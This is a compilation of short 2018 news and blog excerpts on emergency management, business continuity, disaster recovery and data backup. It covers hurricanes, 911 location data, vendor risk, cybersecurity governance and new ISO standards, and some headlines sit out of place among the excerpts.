"Most firefighters carry between 50 and 60 pounds of equipment and when you add the sweat on it, it gains weight," Director of Cleveland County Emergency Management Perry Davis said.

At a fire on Phifer Circle Monday, a dozen firefighters swapped in and out fighting the blaze to make sure they didn't put themselves in danger.



Organizations of all sizes are increasingly turning to third-party vendors to handle tasks which would formerly have been performed in-house. Such tasks can range from payroll and accounting to email to presentation and meeting software.

In handing these tasks over to third-party suppliers, organizations are also passing along the obligation to provide business continuity (BC) and recovery capability for the services they provide—a responsibility they are generally glad to get off their plates.

From the BC perspective, there is nothing inherently wrong with an organization turning to outside vendors to meet their needs. However, too often organizations take the approach of “out of sight, out of mind” with their third-party vendors, and in doing so they are running a considerable risk.

Third-party suppliers have the potential of being an Achilles’ heel for your organization, meaning they are a small area of vulnerability that could potentially cause a significant amount of damage.



The Technology Disrupting the Health Care Industry

Blockchain tech is disrupting multiple industries, and perhaps none more so than health care. Organizations using the technology for storing medical records are experiencing the benefit of complete data security, of course. Another noteworthy advantage is unprecedented data portability.

We’re living in a crypto, bitcoiny, blockchainy world that’s spinning out disruptions faster than McDonald’s serves Big Macs.

They say the first Bitcoin transaction was 10,000 Bitcoins per uno pizza. Now, 6 Bitcoins buys you a sports car. Man, was that a costly pizza back then!

Ever notice those odd, locking vertical boxes in doctor’s offices? Sometimes you’ll see them located behind where the receptionist sits? Or perhaps they’ll be in a room all by themselves.

They’re known as file cabinets, circa 2017, which were once places for storing sensitive and important information, such as our medical records.

Today those cabinets are dinosaurs. They’re rapidly being replaced by a disruptive new way of storing and accessing medical records based on an entirely new platform made possible today by blockchain technology.



Thursday, 21 June 2018 15:21

Doctor Blockchain Will See You Now

Developing a community’s confidence in an opt-in emergency notification system is essential to success, but not having complete buy-in from the users of the system can slow its development as well.

Ottawa County, Mich., emergency management and first responders faced both of those when they implemented the Smart911 system, developed by Rave, in 2014. But momentum seems to be picking up with public safety and emergency management personnel solidly behind the system and the public headed in that direction too.

Just under 5,000 residents have signed on to the system, but last week more than 200 signed up in a 24-hour period, which was “great progress,” according to the county’s Emergency Management Director Nick Bonstell.



For some businesses, the hybrid storage array offers the best of both worlds. In comparison to the all-flash array – clearly the highest performance option – a hybrid array allows a lower cost, yet also enables some impressive performance. It's the classic "transitional" storage solution as flash becomes ever more dominant in storage infrastructures, yet hard disk drives remain abundant.

Yet for all its advantages, a hybrid storage array isn't the automatic choice. Let's explore the hybrid vs. all-flash array question.



(TNS) - Apps such as Uber, “Pokemon Go” and Snapchat can pinpoint where users are down to the side of a block. But 911 dispatchers have to rely on distant cell towers, sometimes-faulty GPS and the caller — who is likely in distress — to figure out where calls are coming from.

In an effort to thrust 911 call centers into the 21st century, Apple announced Monday that the next major update to iPhone software will allow users in the U.S. to automatically share location data with emergency responders. Software and a data clearinghouse built by New York startup RapidSOS will let 911 centers receive callers’ locations.



(TNS) - Always ready. Always there.

That’s the motto of the National Guard, and for 48 days — and counting — soldiers and airmen from this component of the military have been doing safety and relief work amid volcanic threats and destruction on the east side of Hawaii island.

More than 200 Guardsmen have been assisting Hawaii County Civil Defense with jobs that include monitoring dangerous gas emissions from lava flows, manning security checkpoints, building emergency housing and conducting search-and-rescue missions.

Many of these servicemen and women are volunteers and are from around the state, including some who live on the active volcanoes that make up the Big Island and never imagined they would be responding to a lava eruption disaster in their own community.



According to hurricane research scientists at Colorado State University, the 2018 hurricane season is set to be slightly above average in activity.

Thankfully that’s better than the 2017 season, which cost more than $282 billion and caused up to 4,770 fatalities.  Whether we see two named storms or ten, preparation is your greatest ally against potential devastation.  Start by using these automated message templates for your organization’s mass notification system.

Using Hurricane Notification Message Templates

When using message templates, there are a few basic guidelines to follow. Start by keeping the message length to a minimum. This ensures recipients can get the most information in the least amount of time. In addition, SMS messages cannot exceed 918 characters; longer messages are broken up into multiple messages that may create confusion.

By creating message templates prior to severe weather, you can generate detailed and informative alerts for every step in your emergency plan. Then in the wake of a hurricane, these messages are ready to be sent to the right audiences. Recipients receive only those messages that apply to them, which helps to eliminate confusion during a stressful time.



Cybersecurity Committees on the Rise

We’re seeing a growing trend: organizations across diverse industries are beginning to establish committees dedicated specifically to cybersecurity. Some are assigning audit committees to the task, but there’s good reason in many cases to create a new committee. Whatever governance model is adopted, independent oversight is imperative.

“Cybersecurity risks pose grave threats to investors, our capital markets and our country.”

This is the opening sentence of the SEC’s Interpretive Guidance on Public Company Cybersecurity Disclosures dated February 21, 2018. While the SEC’s focus is primarily on effective disclosure controls and procedures for accurate and timely disclosures of cyber risks and material events, the magnitude of this topic has deep operating and compliance ramifications. The big question in boardrooms is who precisely should be responsible for cybersecurity oversight?

Many companies rationalize that cybersecurity oversight should reside with their audit committee since there are SEC disclosure ramifications. However, does this make sense considering that cyber risks extend well beyond financial reporting and SEC disclosures?  While there is no single correct answer considering the large array of risk environments, industries, organizational sizes and operating models, it is clear that cybersecurity committees are becoming more popular. A search of recent proxy statement filings with the SEC revealed 12 companies disclosing cybersecurity committees, five of which were created in the last year. This article sheds some light on these filings, as well as some considerations for cybersecurity governance.



Tuesday, 19 June 2018 15:51

Governing Cybersecurity

(TNS) — We find ourselves in another hurricane season, and Pender County, N.C., is preparing.

Are you? Are we all?

Pender just paid $18,000 to install a flood gauge on the N.C. 210 bridge over the Black River near Currie.

Last time we read about that section of 210, it was under water. Hurricane Matthew in 2016 swelled the Black River over its banks, less than 20 years after 1999’s Hurricane Floyd sent the Northeast Cape Fear and other rivers flowing into fields, homes and highways across Eastern North Carolina.

We commend Pender County for paying for the gauge even though, as Board of Commissioners Chairman George Brown noted, the state usually pays for those instruments.

The device is the county’s second one and is one of 560 river and coastal gauges that provide real-time water level information to warn residents who live and work nearby, as well as first responders and other emergency officials who need to know when roads are becoming impassible.



(TNS) — In the 13 years since Hurricane Katrina hit South Mississippi, much has changed.

A quick drive down U.S. 90 is a constant reminder of the past — the things that are new and that have been rebuilt and the places that are memories of life before the storm.

One of the things that changed significantly besides the landscape is technology. Facebook was in its infancy in 2005, having been launched the year before the storm, and most social media users were using MySpace. It would also be another two years before Apple released the iPhone and helped to usher in the era of smartphones and tablets.

For many Coast residents, cellphone service was spotty, at best, in the days and weeks after Hurricane Katrina. And internet service for phones was practically nonexistent.

With Colorado State University’s Tropical Meteorology Project predicting a "busy" hurricane season for 2018, which began June 1, how will cellphone service be affected in South Mississippi?



Climate change is a growing threat for national and local governments alike.

Entire communities can be devastated by extreme weather events, including hurricanes, droughts, and wildfires, each of which are exacerbated by climate change. While natural disasters themselves are a main concern for government agencies, the public may still be at risk long after a storm has passed. Debris and toxic materials can linger in the aftermath, posing potential health hazards for communities as they attempt to rebuild.

For government agencies, this means placing more focus on preparedness and response and addressing the safety of residents and staff during the recovery phase. During Hurricane Harvey in 2017, for example, the death toll continued rising even after the storm had passed. To prevent additional injuries, emergency officials must be aware of any hazards that exist in the wake of these disasters and inform the public accordingly.



Lessons From The Giant

While not every organization is a nearly 2 billion user, social media giant like Facebook, there’s a lesson to be learned for all organizations from recent events: in today’s data-driven business environment, customer trust matters more than ever before. In this article, Gartner’s Stephanie Quaranta outlines steps privacy and compliance executives need to take in order to protect the value of their customer relationships and ultimately minimize their company’s exposure to privacy risk.

By now, the saga of Facebook and Cambridge Analytica is familiar to us all. In 2013, University of Cambridge researcher Aleksandr Kogan collected personal data from 270,000 Facebook users through a personality test app called “thisisyourdigitallife.” At the time, Facebook’s policies allowed app developers to collect data not just from users who had explicitly consented, but from those users’ friends as well. Kogan assigned test takers and their friends to psychographic segments using the collected data, then sold that information to a political consulting firm called Cambridge Analytica.

Though Facebook discovered this at the end of 2015, it chose not to alert impacted users. Instead, Facebook simply asked Cambridge Analytica to delete the data. Only in March of this year, after an exposè by The New York Times and The Observer of London reported on the data harvesting and Cambridge Analytica’s use of that information to micro-target voters in advance of the 2016 Brexit vote and US presidential election, did Facebook go public with what had happened.

The immediate backlash was fierce. Facebook stock plummeted 18% in 11 days, wiping out $80 billion in value. The hashtag #deletefacebook emerged, with Google searches on how to delete your profile more than quadrupling in the week the scandal broke. Regulators and lawmakers across the globe opened investigations into Facebook’s privacy practices.



Monday, 18 June 2018 14:52

What Happened At Facebook?

There is no better time to prepare for an economic downturn than when business is good. With the severity of the 2007–2008 financial crisis still fresh on the minds of many directors and executives, how should companies prepare for an economic downturn in the cool of the day rather than reacting in crisis mode in the heat of the moment?

At this time, most established business plans do not contemplate an economic downturn. However, some observers are forecasting a recession in the United States within the next couple of years – say, by 2020. Everyone is watching interest rates, trade, government spending, geopolitical tensions and other “tea leaves” carefully. The truth is, no one knows what the future has in store. But memories of the severity of the last downturn and its consequences for most organizations have not faded. That’s why, for most companies and their management teams and boards, a contingency plan makes good business sense, as it positions them to act decisively when recessionary storm clouds begin to loom on the horizon.

Contingency plans are certainly not new, as organizations have been developing them for a long time. Plans are documented with specific action steps that are triggered if certain harmful events occur. Such events might include natural disasters (floods, earthquakes, etc.), cybersecurity breaches, terrorist activities, fire, fraud, theft or embezzlement. Notably, these perils may never occur, but the plan stands ready nonetheless if they do. Plans are also developed to address market opportunities, should they arise.



On June 12, Advisen held a webinar entitled “Big nasty claims. What are the large loss trends in the casualty sector?” To qualify as big and nasty, the casualty claims stem from injury and/or property damage resulting from incidents such as train derailments, chemical spills and food contamination, frequently involving multiple parties, and costing $100 million or more each.

Advisen’s large loss dataset yielded some interesting insights into trends in this area, and Jim Blinn, Advisen’s moderator, was joined by two Allied World claims experts, James Minniti and Paul DeGiulio.

Advisen’s dataset reveals that pharmaceutical and medicine manufacturing, transportation equipment manufacturing, and machinery and electronics manufacturing are the top three industries involved in large claims, with public administration in fourth place.



Charlie Maclean Bristol, FBCI, FEPS, explains how you can improve your business continuity plans by altering the format and following five key steps.

When developing business continuity plans, I try to make them accessible, practical and easy to use. For a long time, I followed a traditional format, with the first few pages being filled up with scope, assumptions, objectives and the like. The problem with this format is that you have to wade through several pages before getting to the bit of the plan which would actually be used during an incident.

After a while, it occurred to me that when you make use of the plan in anger, what you don’t need to read first is a set of assumptions in the plan. By then it is a bit too late to ponder on whether the assumptions are right! This is when the radical idea came to me, of putting what you need first early in the plan; and then other information and the reference material at the end. From this idea, five steps were born:'



The 2018 FIFA World Cup has now started, with four weeks of football to enthuse fans across the globe. Behind the sporting glory and the celebrations, there will be a firm spotlight on the resilience not just shown by the teams, but also the wider infrastructure in place to make it all happen. Dr. Sandra Bell looks at the lessons that organizations can take from the event.

As with any global sporting event, attention always turns to the host city and their readiness to host such an occasion -  everything from stadium capacity and accessibility, to hospitality in the stadium is called into question. However, while the onus is currently on Russia to host a smooth and successful event, the World Cup should be seen as a catalyst for all businesses to improve the long-term resilience of both their workforce – their ‘teams’ -  and their own infrastructure.

So, what lessons can businesses learn from the World Cup about readiness to be resilient?

Dealing with emerging security threats

Security threats have always been a factor for major hospitality events, but even in recent years these threats have changed both in nature and severity. FIFA has already discussed upping the security for the World Cup, with growing cyber security attacks on infrastructure becoming increasingly prevalent.

The World Economic Forum's (WEF) Global Risks Report 2018 names cyber attacks and cyber warfare as a top cause of disruption in the next five years, coming only after natural disasters and extreme weather events. In this same vein as World Cup organizers, businesses cannot just look at what has gone on before but need to constantly keep one step ahead of new threats. The nature of attacks is constantly evolving, with Internet of Things devices and critical supply chains becoming frequent targets - and no industry will be immune.

As more applications migrate to the cloud, it’s crucial that security moves further up the agenda for business leaders. Cyber threats continue to evolve, and defences will need to be a central component of any digital and business strategy to ensure you aren’t the one caught out.



Organizations are increasingly focusing on becoming resilient; that is, to be able to anticipate, adapt and respond both to incremental and sudden changes or disruptions. But while many organizations are starting to understand what these three components of organizational resilience are, few understand the need to integrate them in order to ensure resilience is actually achieved. Even fewer understand how to structure this collaboration. Philippa Chappell looks at how to achieve this.

The challenge is that while each of the three components of organizational resilience is critical, they are typically the responsibility of different role-players. The ‘anticipate’ component, which involves scoping the threat landscape and putting a risk strategy in place, is handled by the enterprise risk management department. ‘Adapt’, which focuses on operational resilience, would be governed by the COO and the business units concerned. ‘Response’ is addressed by the business continuity manager and covered by the business continuity plan.

In dealing with any threat, it is vital that each of these areas works closely with the others. For example, in the case of a cyber attack, it is vital that the organization knows what cyber risks it faces: What confidential information and intellectual property are held in the systems, and what controls are in place. It would be necessary for the risk management team to collaborate with IT in this case, and the results of its work would inform the actions taken by the operations team. The latter would have to consider the vulnerabilities and identify any single points of failure, such as central legacy system on which all other systems depend. It would also have to put contingency plans in place in the event of an attack.

Clearly, for maximum organizational resilience, these role-players must collaborate across the whole process.



Recently I was walking through the airport, I was in a hurry, of course, and I was running late for my flight.  I had my backpack on, my left hand pulling my carry on, and my phone in the right hand.  For productivity purposes I was walking, reading, responding to emails, and then BOOM! – someone walked right into me.  OK maybe I walked into them, I’m not certain.  Thankfully we both were ok, courteous, and we apologized simultaneously.  Both of us were not paying attention, we had weak peripheral vision, and very poor Situational Awareness.  My lesson was learned. I am not going to be using my phone in any way while walking anywhere any more.  Just like I don’t touch my phone at all while driving my car.  Ok maybe I take a quick glance at my Waze App, but I should stop doing that too.  It’s better to take a wrong turn and get lost than to get into an accident.  Right?  I mean come on, I am in the business of risk mitigation.

In today’s world, we always must be cognizant of Situational Awareness.  Situational Awareness or situation awareness (SA) is the perception of environmental elements and events with respect to time or space, the comprehension of their meaning, and the projection of their status after some variable has changed.  SA is also a field of study concerned with understanding the environment critical to decision-makers in complex, dynamic areas from aviation, air traffic control, military, police, and firefighting.  Heck it’s incorporated into our Incident Management component and maps within BC in the Cloud.  Situational awareness also covers the more ordinary but nevertheless complex tasks such as driving a car, riding a bike, sports, or just walking through the airport.  Someone smart once said ‘Common Sense is not so Common’.  Some say that quote came from Voltaire, some say it was Mark Twain AKA Samuel Clemens.  Anyways, it is such a true statement, and that’s probably a huge reason why we all have jobs in this industry.



Monday, 18 June 2018 14:44

Situational Awareness

Do you wear your seatbelt when driving or riding in a car?

If you are like over 85 percent of the people in the United States, then you do, according to the National Highway Traffic Safety Administration (via Wikipedia).

Does your organization’s business continuity program use the tool of residual risk to quantify the amount of exposure you have to natural, man-made and technological disasters?

If your program is like over 85 percent of programs in the U.S., then you don’t, according to informal surveys I take when I speak at business continuity functions around the country. In fact, I would say that over 95 percent of programs do not measure residual risk.



Deloitte’s Satish Lalchand outlines steps organizations can take to prepare an effective foundation for analytics-driven investigations and fraud monitoring, in the second installment of an article series on the future of forensics.

In recent years, traditional corporate antifraud measures have lost ground against ploys like procurement fraud, employee expense fraud, financial statement fraud, bribery and asset misappropriation. To identify potentially fraudulent transactions, organizations and regulators alike are leveraging integrated, data-driven analytics approaches—which work effectively if the data to be analyzed is top notch.

Data challenges in efforts to monitor fraud and conduct investigations include: vast amounts of data; inadequate data capture and storage; limited data accessibility; gaps in skills required to process and analyze big data; static reporting; and, lack of diverse data to correlate findings.



(TNS) - On the ground once marked by devastation, a new city is rising.

The 1989 Loma Prieta earthquake battered the gritty South of Market district, damaging the Embarcadero Freeway that walled off downtown San Francisco from the bay and left city leaders with a choice: Do they repair and retrofit it, or envision something bolder?

They chose to go in a new direction. And nearly three decades after the temblor, this civic bet is beginning to take shape. The most obvious example is San Francisco’s new skyline, clustered in the South of Market area by design and now fueled by tech money.

The new $1-billion Salesforce Tower, which dwarfs any other skyscraper in the city, is getting the most attention. But it’s only part of the story. There is also a grand bus station and rooftop park set to open this summer.



In case you missed it, MHA Consulting CEO Michael Herrera last month conducted a webinar called “Your New BFFs – Compliance and Residual Risk.” (BFFs means Best Friends Forever, for those who haven’t been keeping up with their modern slang.)

The webinar is now available as a half-hour video which you can watch for free here.

The video is an excellent introduction to two concepts which are at the heart of contemporary business continuity management:

  • The importance of adopting and complying with a business continuity standard, and
  • The benefits of using the concept of residual risk to truly understand the capabilities of your business continuity program and develop a roadmap for its improvement.

We invite you to look at the video and check out the associated slide deck, since there is no substitute for letting Michael walk you through these concepts, if they are new to you.

However, because the content of the webinar is so fundamental, we thought it might be helpful in today’s post to give a thumbnail sketch of the concepts.



Improving safety is a key objective of most industries and boosting the quality of the products and services that contribute to safety is necessary to achieve it. The nuclear sector is set to benefit with a new ISO standard that does just that.

While major accidents in the nuclear sector are rare, the consequences are unimaginable, making the nuclear industry a highly regulated business. This includes the safety and quality requirements of those in the supply chain that supply products and services important to the sector’s safety.

A freshly published standard applies the principles of one of the world’s most renowned quality standards, ISO 9001, to the nuclear sector, combining best practice in quality with the specific requirements of the nuclear industry.



Manufacturing companies have a lot to consider when it comes to physical security. Not only do they have to think about protecting the people working in the facility and the products that they are producing but also their customer and employee information, financial records, product information/trade secrets, and much more.

Now, consider the added pressure of the daily news headlines reporting security breaches. Every day there seems to be another organization that becomes a victim to hackers. Leadership teams face tough decisions on how to allocate their security budget to try and protect their business from being the next one at risk. With cyber breaches happening so often, it’s understandable why companies are increasing cybersecurity budgets, but they shouldn’t put all their eggs in one security basket.

When physical devices fail, it has the potential to put all security investments at risk. Think about a manufacturers server room. There may be data encryption and authentication to provide reliable security, but if someone breaks into the facility, those security measures are useless.

For manufacturers, protecting physical security also means protecting information, personnel and product. 

As manufacturing becomes increasingly connected, it’s vital that manufacturers adopt more modern security practices that go beyond a traditional perimeter security approach. It’s safe to assume that cybercriminals will hack into your network at some point. Therefore, it’s important to make sure that the most important data is locked up in a way that hackers couldn’t touch it, even if they break in. 



In 2018, MetricStream Research surveyed 120 respondents from 20 different industries to understand the level of GDPR awareness and preparedness across enterprises. A majority (53%) of the respondents who have implemented governance, risk, and compliance (GRC) solutions reported that they would be GDPR compliant by the May 25 deadline.

Download this report to learn more about the survey findings, including:

• The state of GDPR awareness and engagement
• The state of GDPR readiness
• GDPR compliance challenges, benefits, and spend

Access the complimentary copy of the report today.


Among the concerns about disaster-recovery, the assurance of recovery is the most important one for businesses. Data movers focus only on the test fail over procedure. In order to have resilience recovery, organizations must have disaster recovery simulation on weekly or monthly basis. Moreover, short periods of DR tests, Provides the organization, the confidence and experience necessary to respond to real emergency. Practice makes perfect.

Organizations should be able to identify failure in the recovery plan prior to actual disaster situation. It is a very challenging journey to walk through from the unknown and the risky position, to 100% Recovery assurance! The demand for a thorough, frequent automatic DR test tool become to be urgent as highly important. Organizations would like to get ready to any disaster situation. To be recovery guarantee.

During real disaster, a lot of unexpected problems will popup. you must know at least you are DR READY. Reliable disaster recovery is critical for business survival. Organizations don’t get second chance when disaster strike. During that critical demanding moment, a lot of unexpected problems will popup.

Without periodic testing, time has a way of eroding a disaster-recovery plan’s effectiveness. Most of the organizations don’t know to tell is they really DR READY.

Environmental changes can prevent servers to turn-on properly, network problems like mac address, IP address, DHCP and dissimilar infra. Application unable to run or DB inconsistent: sometimes we have notices customers who changed the number of servers that run a certain application. They didn’t know they haven’t updated the secondary site. DC that can't recover, that can shut down the entire site. Personnel dependency; Sometimes its personnel turnover, missing knowledge, availability - is he onsite or is he away. And in the end, all you get is a yearly test, which is far from being enough.

An intelligent DR test should include:

  • Automation testing that cut resources and save money
  • Determining the feasibility of the recovery process
  • Identifying areas of the plan that need modification or enhancement
  • Demonstrating the ability of the business to recover
  • Identifying deficiencies in existing procedures
  • And increasing the quality and knowledge of the people who execute the disaster-recovery

When disaster occurs, the organization got one chance to recover. DR Readiness is critical for business survival. Only short periods DR test can address that need.

Shay UriUri Shay is the chief executive officer of EnsureDR ltd., a software that simulates a disaster recovery process, automatically and frequently.

Wednesday, 13 June 2018 14:19

Are You Disaster Ready?

(TNS) - As teams from the Federal Emergency Management Agency set out to do their first tours of the damage from powerful storms that devastated some Connecticut towns last month, two members of the state’s congressional delegation said every effort was underway to get federal assistance to help with the cleanup.

“The costs are in the tens of millions, if not the hundreds of millions of dollars,” U.S. Sen Richard Blumenthal said Monday morning outside the public works department in Hamden, one of the hardest-hit towns. “We don’t know the precise numbers but that’s why FEMA is here. They are going to be fanning out across the state.”

FEMA was called in at the request of the state and will spend the better part of the week doing preliminary assessments. They were joined by a number of teams from the state.

“We are committed to stay here as long as it takes to accomplish this mission,” said Diego Alvarado, a spokesman for FEMA.

Alvarado said the process for the state to get federal assistance is still in its early stages. The visit this week provides Gov. Dannel P. Malloy with the information to seek a disaster declaration and then the information goes to the president’s office for the necessary proclamation to approve assistance, officials said. The process, they said, could take months.



By TIFFANY BLOOMER, President, Aventis Systems

There’s screaming in the background. A window breaks. A peak around the cubicle reveals coworkers fleeing in terror while others hide hopelessly under their desks.

No, it’s not the end of the world. … It’s your network. Your systems failed, and critical, sensitive business data is lost permanently. It’s a data apocalypse, and your company is infected.

For any business to survive, it has to have availability. It must be up and running at all times for its customers, as well as its employees. Connections to business information must be reliable and continuous. This means backing up workstations and laptops, but also server and storage data, which is equally important.

With the exception of its employees, a business’s data is its most important asset, and a major loss can be fatal. Some 60% of small businesses that lose their data will shut down completely within just six months, yet the majority of small businesses still don’t backup their data. Why?

The good news is that downtime and lost data, productivity and revenue can be avoided if you are adequately prepared. Here are some top data backup survival tools every small business needs to avoid a data apocalypse:


Data Backup: Easy as Pi

To create a safe zone around your data, back up following this simple rule: Keep your data in three different places, on two different forms of media, with one stored offsite.

A single data center leaves you much more vulnerable than if your data is backed up in multiple places. IT best practices dictate redundancy — which includes the physical space. When the grid goes down and the zombies advance, it won’t help to have all your backup data stored in your office building.

To be safe, keep your original data plus multiple backups current at all times and store one offsite — as far away as possible! For added protection, store it in a weather-proof and fireproof safe at another geographic location.


Survival Tool #1: Backup Hardware

The first thing you need in your survival kit is the right storage device for your business environment and budget. There are four main types of backup hardware:

  • NAS — Network Attached Storage (NAS) is most often used for shared file systems joined by an ethernet network connection. It also works well for advanced applications such as file shares. Any server with attached storage can be used as NAS, allowing multiple servers or workstations to access data from a single network. The most scalable storage solution for SMBs, NAS storage equipment comes in a variety of configurable drive options and interfaces, is very versatile and includes a management interface.
  • SAN — Storage Attached Network (SAN) is a dedicated storage network for those requiring high-end storage capabilities. It provides block-level access to data at high speeds. Making large amounts of data more manageable, block-level storage allows you to control each block, or group, of data as an individual hard drive. SAN solutions are ideal for enterprise organizations because of their ability to transfer large data blocks between servers and storage.
  • DAS — Direct Attached Storage (DAS) is used to expand existing server storage with additional disks. It’s compatible with any server and is favored for its cost-saving benefits. It allows you to extend the size of your current box without an additional operating system. When used with a file server, DAS still allows user and application sharing.
  • Tape — Tape backup might be more “old school,” but it’s making a comeback in some SMB environments — primarily because it is offline. With tape, data is periodically copied from a primary storage device to tape cartridges, so you can recover it in case of a failure or hard disk crash. You can do manual backups or program them to be automatic. Tape is the least expensive way to store your data offsite because it’s light and compact, allowing you to take it with you or ship it to a holding space.
Survival Tool #2: Backup Software

If you have the right backup hardware in place, you need backup software you can trust to recover your data without compromising security.

Veeam Availability Suite is an excellent backup option for virtual machines (VMs) and physical servers. Software is managed through the same space as virtual backups. When disaster strikes, Veeam has your back with:

  • Guaranteed Availability — Get access to fast recovery time and recovery point objectives for all VM systems in less than 15 minutes for all applications and data.
  • Absolute Privacy — With licensing, your backup data is always secure with unique end-to-end encryption.
  • Long-Term Retention — Data is retained for as long as you need it with advanced native-tape support and direct-storage integrations with industry-leading storage providers like EMC, Hewlett Packard Enterprise and NetApp.
  • Built-In Disaster Recovery — With the high-level license, disaster recovery testing is built-in, and Veeam guarantees recovery point objectives of less than 15 minutes for all applications and data, as well as simplified proof of compliance with automated reporting.
Survival Tool #3: Cloud Services

When zombies, floods, hurricanes or other catastrophes wipe out the office, you’ll be glad you backed up your data offsite. Backing up everything in the cloud ensures it is always safe — no matter what happens.

What is cloud disaster recovery?

Simply put, cloud disaster recovery is a way to store and maintain copies of electronic data in a cloud storage environment to keep it safe. This way, if your system goes down, you can easily recover your company’s mission-critical data.

Why trust the cloud?

Some major benefits to managed services in the cloud include:

Business Continuity

While you’re recovering from an on-premise failure, cloud storage options will allow you to access mission-critical data and applications. As a result, your business can continue to function.

Lower Upfront Costs

Upfront costs are low, and ongoing costs are predictable, so you can more accurately budget your IT dollars.

More Time to Prep

By outsourcing data protection duties, your IT team can focus on more strategic issues.

Be Prepared

A system failure or loss of data can have catastrophic consequences on your business. To ensure you’re not left in the dark, learn more about the other tools you need and the steps you should take with this free e-book.

Choose backup hardware, software, a managed service provider and cloud storage to make sure your data is protected — no matter what or where disaster strikes. Also, don’t forget to test the local and remote backups to ensure the data you’re storing is usable.

You may not be able to predict the next tornado or save the world from walkers, but you can make sure your data survives!

About the Author

Tiffany Bloomer is president of Aventis Systems. Aventis Systems provides IT services and equipment to small and medium businesses around the world.

What could Barbra Streisand, John Wayne, Star Wars and The Sting possibly have in common? More than forty years ago, they were the most popular entities in popular culture as measured by the inaugural edition of The People’s Choice Awards.

Earning the People’s Choice award in the cloud storage/backup category provides confirmation that Cloud Recovery – AWS exceeds our customers’ expectations for managing their growing data, and driving down the cost of cloud-based recovery.

The People’s Choice Awards were created in 1974 to recognize the people and works of popular culture, as voted on by the public. And while the entertainment industry has always been well-represented in the culture wars, the business world now has its own People’s Choice Awards: The People’s Choice Stevie® Awards for Favorite New Products, a feature of The American Business Awards®, the U.S.A.’s top business awards program. Sungard Availability Services (Sungard AS) is proud to receive this year’s People’s Choice award for cloud/storage backup for its Cloud Recovery – AWS solution.

Debuting in 2002, the most recent worldwide public vote in The People’s Choice Stevie® Awards for Favorite New Products was conducted last month. The highest number of votes decides the winners in a variety of product categories. More than 58,000 votes were cast, and Sungard AS’ Cloud Recovery AWS was selected as the overall winner in the Cloud Storage/Backup category.



(TNS) - Imagine a job that involves managing the worst day of someone’s life dozens of times every day. Answering phone calls from scared or angry people for 10 hours or more at a time and coordinating a rapid response from multiple agencies. One mistake or misstep could have potentially fatal consequences.

This is the job description of a 911 dispatcher.

“They are a critical link in the public safety chain that is often overlooked because they’re not driving police cars or fire trucks,” said Flathead Emergency Communications Center Director Elizabeth Brooks. “They’re the first responders. They’re the first on scene even though they’re not physically there, and the quality of your response often starts with a skilled 911 dispatcher.”

However, the voice answering the phone belongs to a human being, one that must find a way to handle every crisis that occurs within their community.



(TNS) - Director of the Scioto County, Ohio, Emergency Management Agency Kim Carver said this week there is federal disaster relief money headed to Southern Ohio. It’s arrival just may take longer than expected, she added.

“All Scioto County jurisdictions will be eligible for reimbursement for up to 87.5 percent of costs associated with response and recovery to the flooding in February, including flood defense costs in the city of Portsmouth and village of New Boston,” Carver said in comments made when the state was approved for FEMA assistance in mid-April.

A declaration of emergency was signed by President Trump April 19 in response to flooding and landslides that slammed the area Feb.14-25. However, Carver said recently FEMA is using a new service model to deliver funds relating to the February disaster.



The world’s much anticipated International Standard for occupational health and safety (OH&S) has just been published, and is set to transform workplace practices globally.

ISO 45001:2018, Occupational health and safety management systems – Requirements with guidance for use, provides a robust and effective set of processes for improving work safety in global supply chains. Designed to help organizations of all sizes and industries, the new International Standard is expected to reduce workplace injuries and illnesses around the world.

According to 2017 calculations by the International Labour Organization (ILO), 2.78 million fatal accidents occur at work yearly. This means that, every day, almost 7 700 persons die of work-related diseases or injuries. Additionally, there are some 374 million non-fatal work-related injuries and illnesses each year, many of these resulting in extended absences from work. This paints a sober picture of the modern workplace – one where workers can suffer serious consequences as a result of simply “doing their job”.

ISO 45001 hopes to change that. It provides governmental agencies, industry and other affected stakeholders with effective, usable guidance for improving worker safety in countries around the world. By means of an easy-to-use framework, it can be applied to both captive and partner factories and production facilities, regardless of their location.



Monday, 11 June 2018 14:40

ISO 45001 is now published

Download the authoritative guide: Enterprise Data Storage 2018: Optimizing Your Storage Infrastructure

Disasters come in many forms. Corruption, theft, loss, or natural disaster can all take down your applications and destroy your data. In an ideal world, your data protection infrastructure would immediately restore all applications and data right at the time and point of failure.

But this is the real world. It is possible to immediately failover an application and to continuously replicate its data for near-zero loss. But these operations are resource-consuming and expensive. Realistically IT needs to set different recovery time and point objectives according to their budget, resources and application priority.

We call these two objectives Recovery Time Objective (RTO) and Recovery Point Objective (RPO). They are related, and both are necessary to application and data recovery. They are also different metrics with different purposes.



The 2017 hurricane season was one for the record books, with four major storms and three more minor ones impacting the U.S. and the Caribbean.

What’s worse, several of them hit land in more than one location — causing additional devastation. There were hundreds of millions of dollars in damage and over 100 deaths attributed to the four main storms alone, making 2017 the costliest hurricane season on record for the United States. Ten of the total 17 named storms for the year reached what is considered hurricane force. When you consider the amount of damage and loss of life, you have to consider: is there any way that businesses and individuals could have been more prepared?

The Major Hurricanes of 2017

The four major hurricanes of 2017 were named Harvey, Irma, Maria and Nate. Starting life as tropical cyclones off the shoreline of the U.S. and the Caribbean, they devastated locations such as Puerto Rico, the Dominican Republic, Louisiana and South Texas. Hurricane Harvey lingered over Texas and Louisiana, making landfall multiples times and causing over $180 billion in damages. More than 30,000 support personnel at the federal level were mobilized to help with cleanup and support efforts. Hurricane Irma came next, with serious storm damage occurring in the Florida Keys and the Caribbean, specifically on the island of Barbuda where more than 90% of buildings were damaged. Irma was “only” a Category 4 storm, but she left behind nearly $200 billion in damages, killed 129 people and caused 40,000 federal personnel to be mobilized.

Hurricane Maria had a catastrophic impact on Puerto Rico, where the Category 4 hurricane stripped the island’s 3.4 million inhabitants of power and basic necessities. While the small country continues to rebuild, it will take years to restore everything that was damaged. Nineteen thousand federal personnel were dispatched to help support the area, where an estimated $95 billion in damages were caused by the storm. Hurricane Nate was the weakest of the four, barely reaching a Category 1 with limited power to cause widespread devastation. Louisiana, Mississippi and Alabama were hardest hit by the 90 mph winds. Damage was worse in South America where Nate was strongest — causing extensive flooding, landslides and 45 deaths.



It’s Time to Take Data to the Next Level

The self-service technology culture allows each business user to access data for analytical purposes. Yet it has created an abundance of rogue data sets across enterprises that may contain outdated or inaccurate information and that fall outside of organization’s data governance structure. With the introduction of the right data intelligence strategy and stewardship, enterprises can improve data quality, build trust and enable collaboration that will impact the bottom-line.

